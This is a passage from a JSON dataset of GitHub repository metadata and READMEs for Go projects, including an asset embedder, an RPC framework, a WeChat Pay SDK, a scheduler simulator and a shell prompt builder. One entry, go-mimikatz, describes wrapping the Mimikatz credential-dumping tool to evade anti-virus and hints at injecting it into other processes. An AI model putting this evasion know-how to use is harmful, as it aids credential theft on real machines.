decompressed only when they are read the first time.\n- \ud83d\ude99 You might want to target the `wasm/js` architecture.\n- \ud83d\udcf0 There is a `-gitignore` option to ignore files already ignored by your\nexisting .gitignore files.\n\n### Performance\nAdmittedly, there are already many packages providing similar functionality out\nthere in the wild. Tim Shannon did an overall pretty good overview of them in\n[Choosing A Library to Embed Static Assets in Go](https://tech.townsourced.com/post/embedding-static-files-in-go/),\nbut it is by now at least two years out of date, so although we subscribe to the\nanalysis, we cannot guarantee that it's up-to-date. Most if not all of the\npackages mentioned in the article rely on gzip compression, and most of them,\nunfortunately, are not compatible with the `wasm/js` architecture, due to some quirk\nthat has to do with their use of the `http` package. 
This, among other things, was\nthe driving force behind the creation of broccoli.\n\nThe most feature-complete library from the comparison table seems to be\n[fileb0x](https://github.com/UnnoTed/fileb0x).\n\n#### How does broccoli compare to fileb0x?\nFeature | fileb0x | broccoli\n--------------------- | ----------- | ------------------\ncompression | gzip | brotli (-20% avg.)\noptional decompression | yes | yes\ncompression levels | yes | yes (1-11)\ndifferent build tags for each file | yes | no\nexclude / ignore files | glob | glob\nunexported vars/funcs | optional | optional\nvirtual memory file system | yes | yes\nhttp file system | yes | yes\nreplace text in files | yes | no\nglob support | yes | yes\nregex support | no | no\nconfig file | yes | no\nupdate files remotely | yes | no\n.gitignore support | no | yes\n\n#### How does it compare to others?\n![](https://i.imgur.com/vB9Miae.png)\n\nBroccoli seems to outperform the existing solutions.\n\nWe did [benchmarks](https://vcs.aletheia.icu/lads/broccoli-bench), please feel\nfree to review them and correct us whenever our methodology could be flawed.\n\n### Usage\n```\n$ broccoli\nUsage: broccoli [options]\n\nBroccoli uses brotli compression to embed a virtual file system in Go executables.\n\nOptions:\n\t-src folder[,file,file2]\n\t\tThe input files and directories, \"public\" by default.\n\t-o\n\t\tName of the generated file, follows input by default.\n\t-var=br\n\t\tName of the exposed variable, \"br\" by default.\n\t-include *.html,*.css\n\t\tWildcard for the files to include, no default.\n\t-exclude *.wasm\n\t\tWildcard for the files to exclude, no default.\n\t-opt\n\t\tOptional decompression: if enabled, files will only be decompressed\n\t\ton the first time they are read.\n\t-gitignore\n\t\tEnables .gitignore rules parsing in each directory, disabled by default.\n\t-quality [level]\n\t\tBrotli compression level (1-11), the highest by default.\n\nGenerate a broccoli.gen.go file with the variable broccoli:\n\t//go:generate broccoli -src assets -o broccoli -var broccoli\n\nGenerate a regular public.gen.go file, but include all *.wasm files:\n\t//go:generate broccoli -src public -include=\"*.wasm\"\n```\n\nHow broccoli is used in the user code:\n```go\n//go:generate broccoli -src=public,others -o assets\n\nfunc init() {\n br.Walk(\"public\", func(path string, info os.FileInfo, err error) error {\n // walk...\n return nil\n })\n}\n\nfunc main() {\n http.ListenAndServe(\":8080\", br.Serve(\"public\"))\n}\n```\n\n### Credits\nLicense: [MIT](https://vcs.aletheia.icu/lads/broccoli/src/branch/master/LICENSE)\n\nWe would like to thank brotli development team from Google and Andy Balholm, for\nhis c2go pure-Go port of the library. 
Broccoli itself is an effort of a mentoring\nexperiment, lead by [@tucnak](https://github.com/tucnak) on the foundation of\n[Aletheia](https://aletheia.icu).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nats-rpc/nrpc", "link": "https://github.com/nats-rpc/nrpc", "tags": ["grpc", "protobuf", "rpc-framework", "go"], "stars": 526, "description": "nRPC is like gRPC, but over NATS", "lang": "Go", "repo_lang": "", "readme": "# nRPC\n\n[![Build Status](https://travis-ci.org/nats-rpc/nrpc.svg?branch=master)](https://travis-ci.org/nats-rpc/nrpc)\n\nnRPC is an RPC framework like [gRPC](https://grpc.io/), but for\n[NATS](https://nats.io/).\n\nIt can generate a Go client and server from the same .proto file that you'd\nuse to generate gRPC clients and servers. The server is generated as a NATS\n[MsgHandler](https://godoc.org/github.com/nats-io/nats.go#MsgHandler).\n\n## Why NATS?\n\nDoing RPC over NATS'\n[request-response model](http://nats.io/documentation/concepts/nats-req-rep/)\nhas some advantages over a gRPC model:\n\n- **Minimal service discovery**: The clients and servers only need to know the\n endpoints of a NATS cluster. The clients do not need to discover the\n endpoints of individual services they depend on.\n- **Load balancing without load balancers**: Stateless microservices can be\n hosted redundantly and connected to the same NATS cluster. The incoming\n requests can then be random-routed among these using NATS\n [queueing](http://nats.io/documentation/concepts/nats-queueing/). There is\n no need to setup a (high availability) load balancer per microservice.\n\nThe lunch is not always free, however. At scale, the NATS cluster itself can\nbecome a bottleneck. Features of gRPC like streaming and advanced auth are not\navailable.\n\nStill, NATS - and nRPC - offer much lower operational complexity if your\nscale and requirements fit.\n\nAt RapidLoop, we use this model for our [OpsDash](https://www.opsdash.com)\nSaaS product in production and are quite happy with it. nRPC is the third\niteration of an internal library.\n\n## Overview\n\nnRPC comes with a protobuf compiler plugin `protoc-gen-nrpc`, which generates\nGo code from a .proto file.\n\nGiven a .proto file like [helloworld.proto](https://github.com/grpc/grpc-go/blob/master/examples/helloworld/helloworld/helloworld.proto), the usage is like this:\n\n```\n$ ls\nhelloworld.proto\n$ protoc --go_out=. --nrpc_out=. helloworld.proto\n$ ls\nhelloworld.nrpc.go\thelloworld.pb.go\thelloworld.proto\n```\n\nThe .pb.go file, which contains the definitions for the message classes, is\ngenerated by the standard Go plugin for protoc. 
The .nrpc.go file, which\ncontains the definitions for a client, a server interface, and a NATS handler\nis generated by the nRPC plugin.\n\nHave a look at the generated and example files:\n\n- the service definition [helloworld.proto](https://github.com/nats-rpc/nrpc/tree/master/examples/helloworld/helloworld/helloworld.proto)\n- the generated nrpc go file [helloworld.nrpc.go](https://github.com/nats-rpc/nrpc/tree/master/examples/helloworld/helloworld/helloworld.nrpc.go)\n- an example server [greeter_server/main.go](https://github.com/nats-rpc/nrpc/tree/master/examples/helloworld/greeter_server/main.go)\n- an example client [greeter_client/main.go](https://github.com/nats-rpc/nrpc/tree/master/examples/helloworld/greeter_client/main.go)\n\n### How It Works\n\nThe .proto file defines messages (like HelloRequest and HelloReply in the\nexample) and services (Greeter) that have methods (SayHello).\n\nThe messages are generated as Go structs by the regular Go protobuf compiler\nplugin and gets written out to \\*.pb.go files.\n\nFor the rest, nRPC generates three logical pieces.\n\nThe first is a Go interface type (GreeterServer) which your actual\nmicroservice code should implement:\n\n```\n// This is what is contained in the .proto file\nservice Greeter {\n rpc SayHello (HelloRequest) returns (HelloReply) {}\n}\n\n// This is the generated interface which you've to implement\ntype GreeterServer interface {\n SayHello(ctx context.Context, req HelloRequest) (resp HelloReply, err error)\n}\n```\n\nThe second is a client (GreeterClient struct). This struct has\nmethods with appropriate types, that correspond to the service definition. The\nclient code will marshal and wrap the request object (HelloRequest) and do a\nNATS `Request`.\n\n```\n// The client is associated with a NATS connection.\nfunc NewGreeterClient(nc *nats.Conn) *GreeterClient {...}\n\n// And has properly typed methods that will marshal and perform a NATS request.\nfunc (c *GreeterClient) SayHello(req HelloRequest) (resp HelloReply, err error) {...}\n```\n\nThe third and final piece is the handler (GreeterHandler). Given a NATS\nconnection and a server implementation, it can accept NATS requests in the\nformat sent by the client above. It should be installed as a message handler for\na particular NATS subject (defaults to the name of the service) using the\nNATS Subscribe() or QueueSubscribe() methods. 
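As a concrete illustration, wiring the generated handler into a NATS subscription might look roughly like the sketch below (the import path of the generated `helloworld` package and the subject/queue names are assumptions for the example, not something nRPC prescribes):\n\n```go\npackage main\n\nimport (\n    \"context\"\n    \"log\"\n\n    \"github.com/nats-io/nats.go\"\n\n    \"example.com/helloworld\" // package generated from helloworld.proto (illustrative path)\n)\n\n// greeter implements the generated GreeterServer interface.\ntype greeter struct{}\n\nfunc (greeter) SayHello(ctx context.Context, req helloworld.HelloRequest) (helloworld.HelloReply, error) {\n    return helloworld.HelloReply{Message: \"Hello \" + req.Name}, nil\n}\n\nfunc main() {\n    nc, err := nats.Connect(nats.DefaultURL)\n    if err != nil {\n        log.Fatal(err)\n    }\n    defer nc.Close()\n\n    h := helloworld.NewGreeterHandler(context.Background(), nc, greeter{})\n\n    // QueueSubscribe lets redundant instances share the subject, which gives\n    // load balancing for free; a plain Subscribe also works.\n    if _, err := nc.QueueSubscribe(\"Greeter\", \"greeter-workers\", h.Handler); err != nil {\n        log.Fatal(err)\n    }\n    select {} // keep serving requests\n}\n```\n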
It will invoke the appropriate\nmethod of the GreeterServer interface upon receiving the appropriate request.\n\n```\n// A handler is associated with a NATS connection and a server implementation.\nfunc NewGreeterHandler(ctx context.Context, nc *nats.Conn, s GreeterServer) *GreeterHandler {...}\n\n// It has a method that can (should) be used as a NATS message handler.\nfunc (h *GreeterHandler) Handler(msg *nats.Msg) {...}\n```\n\nStanding up a microservice involves:\n\n- writing the .proto service definition file\n- generating the \\*.pb.go and \\*.nrpc.go files\n- implementing the server interface\n- writing a main app that will connect to NATS and start the handler ([see\n example](https://github.com/nats-rpc/nrpc/blob/master/examples/helloworld/greeter_server/main.go))\n\nTo call the service:\n\n- import the package that contains the generated *.nrpc.go files\n- in the client code, connect to NATS\n- create a Caller object and call the methods as necessary ([see example](https://github.com/nats-rpc/nrpc/blob/master/examples/helloworld/greeter_client/main.go))\n\n## Features\n\nThe following wiki pages describe nRPC features in more detail:\n\n- [Load Balancing](https://github.com/nats-rpc/nrpc/wiki/Load-Balancing)\n- [Metrics Instrumentation](https://github.com/nats-rpc/nrpc/wiki/Metrics-Instrumentation)\n using Prometheus\n\n## Installation\n\nnRPC needs Go 1.7 or higher. $GOPATH/bin needs to be in $PATH for the protoc\ninvocation to work. To generate code, you need the protobuf compiler (which\nyou can install from [here](https://github.com/google/protobuf/releases))\nand the nRPC protoc plugin.\n\nTo install the nRPC protoc plugin:\n\n```\n$ go get github.com/nats-rpc/nrpc/protoc-gen-nrpc\n```\n\nTo build and run the example greeter_server:\n\n```\n$ go get github.com/nats-rpc/nrpc/examples/helloworld/greeter_server\n$ greeter_server\nserver is running, ^C quits.\n```\n\nTo build and run the example greeter_client:\n\n```\n$ go get github.com/nats-rpc/nrpc/examples/helloworld/greeter_client\n$ greeter_client\nGreeting: Hello world\n$\n```\n\n## Documentation\n\nTo learn more about describing gRPC services using .proto files, see [here](https://grpc.io/docs/guides/concepts.html).\nTo learn more about NATS, start with their [website](https://nats.io/). To\nlearn more about nRPC, um, read the source code.\n\n## Status\n\nnRPC is in alpha. This means that it will work, but APIs may change without\nnotice.\n\nCurrently there is support only for Go clients and servers.\n\nBuilt by RapidLoop. 
Released under Apache 2.0 license.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "objcoding/wxpay", "link": "https://github.com/objcoding/wxpay", "tags": [], "stars": 526, "description": "\ud83d\udd25\u5fae\u4fe1\u652f\u4ed8(WeChat Pay) SDK for Golang", "lang": "Go", "repo_lang": "", "readme": "# wxpay \n\n![Powered by zch](https://img.shields.io/badge/Powered%20by-zch-blue.svg?style=flat-square) ![Language](https://img.shields.io/badge/language-Go-orange.svg) [![License](https://img.shields.io/badge/license-MIT-blue.svg)](./LICENSE.md)\n\n\nwxpay \u63d0\u4f9b\u4e86\u4ee5\u4e0b\u7684\u65b9\u6cd5\uff1a\n\n| \u65b9\u6cd5\u540d | \u8bf4\u660e |\n| ---------------- | ----------- |\n| MicroPay | \u5237\u5361\u652f\u4ed8 |\n| UnifiedOrder | \u7edf\u4e00\u4e0b\u5355 |\n| OrderQuery | \u67e5\u8be2\u8ba2\u5355 |\n| Reverse | \u64a4\u9500\u8ba2\u5355 |\n| CloseOrder | \u5173\u95ed\u8ba2\u5355 |\n| Refund | \u7533\u8bf7\u9000\u6b3e |\n| RefundQuery | \u67e5\u8be2\u9000\u6b3e |\n| DownloadBill | \u4e0b\u8f7d\u5bf9\u8d26\u5355 |\n| Report | \u4ea4\u6613\u4fdd\u969c |\n| ShortUrl | \u8f6c\u6362\u77ed\u94fe\u63a5 |\n| AuthCodeToOpenid | \u6388\u6743\u7801\u67e5\u8be2openid |\n\n* \u53c2\u6570\u4e3a`Params`\u7c7b\u578b\uff0c\u8fd4\u56de\u7c7b\u578b\u4e5f\u662f`Params`\uff0c`Params` \u662f\u4e00\u4e2a map[string]string \u7c7b\u578b\u3002\n* \u65b9\u6cd5\u5185\u90e8\u4f1a\u5c06\u53c2\u6570\u4f1a\u8f6c\u6362\u6210\u542b\u6709`appid`\u3001`mch_id`\u3001`nonce_str`\u3001`sign_type`\u548c`sign`\u7684XML\uff1b\n* \u9ed8\u8ba4\u4f7f\u7528MD5\u8fdb\u884c\u7b7e\u540d\uff1b\n* \u901a\u8fc7HTTPS\u8bf7\u6c42\u5f97\u5230\u8fd4\u56de\u6570\u636e\u540e\u4f1a\u5bf9\u5176\u505a\u5fc5\u8981\u7684\u5904\u7406\uff08\u4f8b\u5982\u9a8c\u8bc1\u7b7e\u540d\uff0c\u7b7e\u540d\u9519\u8bef\u5219\u629b\u51fa\u5f02\u5e38\uff09\u3002\n* \u5bf9\u4e8eDownloadBill\uff0c\u65e0\u8bba\u662f\u5426\u6210\u529f\u90fd\u8fd4\u56deMap\uff0c\u4e14\u90fd\u542b\u6709`return_code`\u548c`return_msg`\u3002\u82e5\u6210\u529f\uff0c\u5176\u4e2d`return_code`\u4e3a`SUCCESS`\uff0c\u53e6\u5916`data`\u5bf9\u5e94\u5bf9\u8d26\u5355\u6570\u636e\u3002\n\n\n## \u5b89\u88c5\n\n```bash\n$ go get github.com/objcoding/wxpay\n\n```\n\n## go modules\n```cgo\n// go.mod\nrequire github.com/objcoding/wxpay v1.0.5\n\n```\n\n\n## \u793a\u4f8b\n\n```cgo\n// \u521b\u5efa\u652f\u4ed8\u8d26\u6237\naccount1 := wxpay.NewAccount(\"appid\", \"mchid\", \"apiKey\", false)\naccount2 := wxpay.NewAccount(\"appid\", \"mchid\", \"apiKey\", false)\n\n// \u65b0\u5efa\u5fae\u4fe1\u652f\u4ed8\u5ba2\u6237\u7aef\nclient := wxpay.NewClient(account1)\n\n// \u8bbe\u7f6e\u8bc1\u4e66\naccount.SetCertData(\"\u8bc1\u4e66\u5730\u5740\")\n\n// \u8bbe\u7f6e\u652f\u4ed8\u8d26\u6237\nclient.setAccount(account2)\n\n// \u8bbe\u7f6ehttp\u8bf7\u6c42\u8d85\u65f6\u65f6\u95f4\nclient.SetHttpConnectTimeoutMs(2000)\n\n// \u8bbe\u7f6ehttp\u8bfb\u53d6\u4fe1\u606f\u6d41\u8d85\u65f6\u65f6\u95f4\nclient.SetHttpReadTimeoutMs(1000)\n\n// \u66f4\u6539\u7b7e\u540d\u7c7b\u578b\nclient.SetSignType(HMACSHA256)\n\n```\n\n```cgo\n// \u7edf\u4e00\u4e0b\u5355\nparams := make(wxpay.Params)\nparams.SetString(\"body\", \"test\").\n\t\tSetString(\"out_trade_no\", \"436577857\").\n\t\tSetInt64(\"total_fee\", 1).\n\t\tSetString(\"spbill_create_ip\", \"127.0.0.1\").\n\t\tSetString(\"notify_url\", \"http://notify.objcoding.com/notify\").\n\t\tSetString(\"trade_type\", \"APP\")\np, _ := client.UnifiedOrder(params)\n\n// \u8ba2\u5355\u67e5\u8be2\nparams := 
make(wxpay.Params)\nparams.SetString(\"out_trade_no\", \"3568785\")\np, _ := client.OrderQuery(params)\n\n// \u9000\u6b3e\nparams := make(wxpay.Params)\nparams.SetString(\"out_trade_no\", \"3568785\").\n\t\tSetString(\"out_refund_no\", \"19374568\").\n\t\tSetInt64(\"total_fee\", 1).\n\t\tSetInt64(\"refund_fee\", 1)\np, _ := client.Refund(params)\n\n// \u9000\u6b3e\u67e5\u8be2\nparams := make(wxpay.Params)\nparams.SetString(\"out_refund_no\", \"3568785\")\np, _ := client.RefundQuery(params)\n\n```\n\n\n```cgo\n// \u7b7e\u540d\nsignStr := client.Sign(params)\n\n// \u6821\u9a8c\u7b7e\u540d\nb := client.ValidSign(params)\n\n```\n\n```cgo\n// xml\u89e3\u6790\nparams := wxpay.XmlToMap(xmlStr)\n\n// map\u5c01\u88c5xml\u8bf7\u6c42\u53c2\u6570\nb := wxpay.MapToXml(params)\n\n```\n\n```cgo\n// \u652f\u4ed8\u6216\u9000\u6b3e\u8fd4\u56de\u6210\u529f\u4fe1\u606f\nreturn wxpay.Notifies{}.OK()\n\n// \u652f\u4ed8\u6216\u9000\u6b3e\u8fd4\u56de\u5931\u8d25\u4fe1\u606f\nreturn wxpay.Notifies{}.NotOK(\"\u652f\u4ed8\u5931\u8d25\u6216\u9000\u6b3e\u5931\u8d25\u4e86\")\n\n```\n\n![objcoding](https://raw.githubusercontent.com/objcoding/objcoding.github.io/master/images/official_accounts.jpg)\n\n\n## License\nMIT license\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "limetext/backend", "link": "https://github.com/limetext/backend", "tags": ["golang", "editor"], "stars": 526, "description": "Backend for LimeText", "lang": "Go", "repo_lang": "", "readme": "# lime-backend\n[![Build Status](https://travis-ci.org/limetext/backend.svg?branch=master)](https://travis-ci.org/limetext/backend)\n[![Coverage Status](https://img.shields.io/coveralls/limetext/backend.svg?branch=master)](https://coveralls.io/r/limetext/backend?branch=master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/limetext/backend)](https://goreportcard.com/report/github.com/limetext/backend)\n[![GoDoc](https://godoc.org/github.com/limetext/backend?status.svg)](https://godoc.org/github.com/limetext/backend)\n\n[![Bountysource Bounties](https://www.bountysource.com/badge/team?team_id=8742&style=bounties_received)](https://www.bountysource.com/teams/limetext/issues?utm_source=limetext&utm_medium=shield&utm_campaign=bounties_received)\n[![Bountysource Raised](https://www.bountysource.com/badge/team?team_id=8742&style=raised)](https://www.bountysource.com/teams/limetext?utm_source=limetext&utm_medium=shield&utm_campaign=raised)\n\n[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/limetext/lime)\n\nThis is the backend code for Lime. For more information about the project, please see [limetext/lime](https://github.com/limetext/lime).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "client9/ipcat", "link": "https://github.com/client9/ipcat", "tags": [], "stars": 526, "description": "Categorization of IP Addresses", "lang": "Go", "repo_lang": "", "readme": "**ipcat**: datasets for categorizing IP addresses.\n\nArchived in 2023. Please fork and edit as you wish. It's MIT now. Onward -- nickg\n\n---\n\nThis is a list of IPv4 addresses that correspond to datacenters,\nco-location centers, shared and virtual webhosting providers. 
In\nother words, ip addresses that end web consumers should not be using.\n\nStatistics\n------------------------\n\nCheck out the new [datacenter stats](/datacenters-stats.csv)\n\nWhat is the file format?\n-------------------------\n\n\n\nStandard CSV with ip-start, ip-end (inclusive, in dot-notation),\nname of provider, url of provider. IP ranges are non-overlapping,\nand in sorted order.\n\nWhy is hosting provider XXX is missing?\n---------------------------------------\n\nIt might not be. Many providers are resellers of another and will be\nincluded under another name or ip range.\n\nAlso, as of 16-Oct-2011, many locations from Africa, Latin\nAmerica, Korea and Japan are missing.\n\nOr, it might just be missing. Please let us know!\n\nWhy GitHub + CSV?\n-------------------------\n\nThe goal of the file format and the use of github was designed to make\nit really easy for other to send patches or additions. It also provides\nan easy way of keeping track of changes.\n\nHow is this generated?\n-------------------------\n\nManually from users like you, and automatically via proprietary\ndiscovery algorithms.\n\nWho made this?\n-------------------------\n\nNick Galbreath. See more at http://www.client9.com/\n\n", "readme_type": "markdown", "hn_comments": "For the most part, this seemed like an interesting blog post, but toward the end, it came across as a thinly veiled advertisement for this iOS framework. My apologies if I have misconstrued this, but the title is misleading. If you're advertising, say so rather than trying to disguise it.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/kube-scheduler-simulator", "link": "https://github.com/kubernetes-sigs/kube-scheduler-simulator", "tags": ["k8s-sig-scheduling"], "stars": 524, "description": "A web-based simulator for the Kubernetes scheduler", "lang": "Go", "repo_lang": "", "readme": "# Kubernetes scheduler simulator\n\nHello world. Here is Kubernetes scheduler simulator.\n\nNowadays, the scheduler is configurable/extendable in the multiple ways:\n- configure with [KubeSchedulerConfiguration](https://kubernetes.io/docs/reference/scheduling/config/)\n- add Plugins of [Scheduling Framework](https://kubernetes.io/docs/concepts/scheduling-eviction/scheduling-framework/)\n- add [Extenders](https://github.com/kubernetes/enhancements/tree/5320deb4834c05ad9fb491dcd361f952727ece3e/keps/sig-scheduling/1819-scheduler-extender)\n- etc...\n\nBut, unfortunately, not all configurations/expansions yield good results.\nThose who customize the scheduler need to make sure their scheduler is working as expected, and doesn't have an unacceptably negative impact on the scheduling.\n\nIn real Kubernetes, we cannot know the results of scheduling in detail without reading the logs, which usually requires privileged access to the control plane.\nThat's why we are developing a simulator for kube-scheduler -- you can try out the behavior of the scheduler with web UI while checking which plugin made what decision for which Node.\n\n## Simulator's architecture\n\nWe have several components:\n- Simulator (in `/simulator`)\n- Web UI (in `/web`)\n- Coming soon... 
:) (see [./keps](./keps) for some nice ideas we're working on)\n\n### Simulator\n\nThe simulator internally runs a kube-apiserver, a scheduler, and an HTTP server.\n\nYou can create any resources by communicating with the kube-apiserver via kubectl, a k8s client library, or the web UI.\n\nSee the following docs to learn more about the simulator:\n- [how-it-works.md](simulator/docs/how-it-works.md): describes how the simulator works.\n- [kube-apiserver.md](simulator/docs/kube-apiserver.md): describes the kube-apiserver in the simulator (how you can configure and access it).\n- [api.md](simulator/docs/api.md): describes the HTTP server the simulator provides.\n\n### Web UI\n\nThe web UI is one of the clients of the simulator, but it's optimized for the simulator.\n\nFrom the web, you can create/edit/delete these resources to simulate a cluster:\n\n- Nodes\n- Pods\n- Persistent Volumes\n- Persistent Volume Claims\n- Storage Classes\n- Priority Classes\n\n![list resources](simulator/docs/images/resources.png)\n\nYou can create resources with a YAML file as usual.\n\n![create node](simulator/docs/images/create-node.png)\n\nAnd, after pods are scheduled, you can see the results of:\n\n- Each Filter plugin\n- Each Score plugin\n- Final score (normalized, with the plugin weight applied)\n\n![result](simulator/docs/images/result.jpg)\n\nYou can configure the scheduler on the simulator through KubeSchedulerConfiguration.\n\n[Scheduler Configuration | Kubernetes](https://kubernetes.io/docs/reference/scheduling/config/)\n\nYou can pass a KubeSchedulerConfiguration file via the environment variable `KUBE_SCHEDULER_CONFIG_PATH` and the simulator will start kube-scheduler with that configuration.\n\nNote: changes to any fields other than `.profiles` are disabled on the simulator, since they do not affect the results of the scheduling.\n\n![configure scheduler](simulator/docs/images/schedulerconfiguration.png)\n\nIf you want to use your custom plugins as out-of-tree plugins in the simulator, please follow [this doc](simulator/docs/how-to-use-custom-plugins/README.md).\n\n## Getting started\n\nRead more about the environment variables used by the simulator server\n[here](./simulator/docs/env-variables.md).\n\n### Run simulator with Docker\n\nWe have a [docker-compose.yml](docker-compose.yml) to run the simulator easily. You should install [docker](https://docs.docker.com/engine/install/) and [docker-compose](https://docker-docs.netlify.app/compose/install/) first.\n\nYou can use the following command.\n\n```bash\n# build the images for web frontend and simulator server, then start the containers.\nmake docker_build_and_up\n```\n\nThen, you can access the simulator at http://localhost:3000.
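\n\nAs a minimal sketch of the `KUBE_SCHEDULER_CONFIG_PATH` mechanism described above (the file path, `apiVersion` and plugin weight here are illustrative assumptions; whether the variable reaches a containerized setup depends on your docker-compose configuration):\n\n```shell\n# Write a minimal KubeSchedulerConfiguration that only touches .profiles,\n# then point the simulator at it before starting it.\n# The apiVersion may need to match your Kubernetes version.\ncat > /tmp/scheduler-config.yaml <<'EOF'\napiVersion: kubescheduler.config.k8s.io/v1\nkind: KubeSchedulerConfiguration\nprofiles:\n  - schedulerName: default-scheduler\n    plugins:\n      score:\n        enabled:\n          - name: NodeResourcesFit\n            weight: 5\nEOF\nexport KUBE_SCHEDULER_CONFIG_PATH=/tmp/scheduler-config.yaml\n```\n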
If you want to deploy the simulator on a remote server and access it via a specific IP (e.g. http://10.0.0.1:3000/), please make sure that you have executed `export SIMULATOR_EXTERNAL_IP=your.server.ip` before running `docker-compose up -d`.\n\nNote: Insufficient memory allocation may cause problems in building the image.\nPlease allocate enough memory in that case.\n\n### Run simulator locally\n\nYou have to run the frontend, the server and etcd.\n\n#### Run simulator server and etcd\n\nTo run this simulator's server, you have to install Go and etcd.\n\nYou can install etcd with [kubernetes/kubernetes/hack/install-etcd.sh](https://github.com/kubernetes/kubernetes/blob/master/hack/install-etcd.sh).\n\n```bash\ncd simulator\nmake start\n```\n\nIt starts etcd and the simulator server locally.\n\n#### Run simulator frontend\n\nTo run the frontend, please see [README.md](web/README.md) in the ./web dir.\n\n## Contributing\n\nSee [CONTRIBUTING.md](CONTRIBUTING.md).\n\n## Community, discussion, contribution, and support\n\nLearn how to engage with the Kubernetes community on the [community page](http://kubernetes.io/community/).\n\nYou can reach the maintainers of this project at:\n\n- [Slack](http://slack.k8s.io/)\n- [Mailing List](https://groups.google.com/forum/#!forum/kubernetes-dev)\n\n### Code of conduct\n\nParticipation in the Kubernetes community is governed by the [Kubernetes Code of Conduct](code-of-conduct.md).\n\n[owners]: https://git.k8s.io/community/contributors/guide/owners.md\n[creative commons 4.0]: https://git.k8s.io/website/LICENSE\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "vyrus001/go-mimikatz", "link": "https://github.com/vyrus001/go-mimikatz", "tags": [], "stars": 524, "description": "A wrapper around a pre-compiled version of the Mimikatz executable for the purpose of anti-virus evasion.", "lang": "Go", "repo_lang": "", "readme": "# go-mimikatz\nA Go wrapper around Mimikatz for the purpose of anti-virus evasion.\n\n# Building\ncd into the repo and run `go generate`\n\n### Notes:\n* evades Windows again (as of 11/23/2021)\n* If compiled as position independent code (`-buildmode=pie`) via go 1.15 or newer, this code can be transformed via [donut](https://github.com/Binject/go-donut) and then subsequently injected into another process on the target machine (a hint for those trying to avoid disk writes during deployment)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jtyr/gbt", "link": "https://github.com/jtyr/gbt", "tags": ["prompt", "zsh", "go", "shell", "ssh", "docker", "vagrant", "mysql", "termux", "screen", "sudo", "su", "kubectl", "python", "powershell", "gcp", "aws", "azure"], "stars": 524, "description": "Highly configurable prompt builder for Bash, ZSH and PowerShell written in Go.", "lang": "Go", "repo_lang": "", "readme": "Go Bullet Train (GBT)\n=====================\n\nHighly configurable prompt builder for Bash, ZSH and PowerShell written in Go.\nIt's inspired by the [Oh My ZSH](https://github.com/robbyrussell/oh-my-zsh)\n[Bullet Train](https://github.com/caiogondim/bullet-train.zsh) theme but runs\nsignificantly faster.\n\n![Demo](https://raw.githubusercontent.com/jtyr/gbt/master/images/demo.gif \"Demo\")\n\nGBT comes with an interesting feature called\n[prompt forwarding](#prompt-forwarding) which allows forwarding a user-defined\nprompt to a remote machine and having the same-looking prompt across all
machines\nvia SSH but also in Docker, Kubectl, Vagrant, MySQL or in Screen without the\nneed to install anything remotely.\n\n![Prompt forwarding demo](https://raw.githubusercontent.com/jtyr/gbt/master/images/prompt_forwarding.gif \"Prompt forwarding demo\")\n\nAll the above works well on Linux (Terminator, Konsole, Gnome Terminal), Mac\n(Terminal, iTerm), Android (Termux) and Windows (PowerShell, Windows Terminal).\n\n[![Release](https://img.shields.io/github/release/jtyr/gbt.svg)](https://github.com/jtyr/gbt/releases)\n[![Build status](https://travis-ci.org/jtyr/gbt.svg?branch=master)](https://travis-ci.org/jtyr/gbt)\n[![Coverage Status](https://coveralls.io/repos/github/jtyr/gbt/badge.svg?branch=master)](https://coveralls.io/github/jtyr/gbt?branch=master)\n[![Packagecloud](https://img.shields.io/badge/%E2%98%81-Packagecloud-707aed.svg)](https://packagecloud.io/gbt/release)\n\n\nTable of contents\n-----------------\n\n- [Setup](#setup)\n - [Installation](#installation)\n - [Arch Linux](#arch-linux)\n - [CentOS/RHEL](#centosrhel)\n - [Ubuntu/Debian](#ubuntudebian)\n - [Mac](#mac)\n - [Windows](#windows)\n - [Android](#android)\n - [From the source code](#from-the-source-code)\n - [Activation](#activation)\n - [Fonts and colors](#fonts-and-colors)\n- [Configuration](#configuration)\n - [Colors](#colors)\n - [Formatting](#formatting)\n - [Train variables](#train-variables)\n - [Cars variables](#cars-variables)\n - [`Aws` car](#aws-car)\n - [`Azure` car](#azure-car)\n - [`Custom` car](#custom-car)\n - [`Dir` car](#dir-car)\n - [`ExecTime` car](#exectime-car)\n - [`Gcp` car](#gcp-car)\n - [`Git` car](#git-car)\n - [`Hostname` car](#hostname-car)\n - [`Kubectl` car](#kubectl-car)\n - [`Os` car](#os-car)\n - [`PyVirtEnv` car](#pyvirtenv-car)\n - [`Sign` car](#sign-car)\n - [`Status` car](#status-car)\n - [`Time` car](#time-car)\n- [Benchmark](#benchmark)\n- [Prompt forwarding](#prompt-forwarding)\n - [Principle](#principle)\n - [Additional settings](#additional-settings)\n - [MacOS users](#macos-users)\n - [Limitations](#limitations)\n- [TODO](#todo)\n- [Author](#author)\n- [License](#license)\n\n\nSetup\n-----\n\nIn order to setup GBT on your machine, you have to [install](#installation) it,\n[activate](#activation) it and setup a special [font](#fonts-and-colors) in your\nterminal (optional).\n\n### Installation\n\n#### Arch Linux\n\n```shell\nyaourt -S gbt\n```\n\nOr install `gbt-git` if you would like to run the latest greatest from the\n`master` branch.\n\n#### CentOS/RHEL\n\nPackages hosted by [Packagecloud](https://packagecloud.io/gbt/release):\n\n```shell\necho '[gbt]\nname=GBT YUM repo\nbaseurl=https://packagecloud.io/gbt/release/el/7/$basearch\ngpgkey=https://packagecloud.io/gbt/release/gpgkey\n https://packagecloud.io/gbt/release/gpgkey/gbt-release-4C6E79EFF45439B6.pub.gpg\ngpgcheck=1\nrepo_gpgcheck=1' | sudo tee 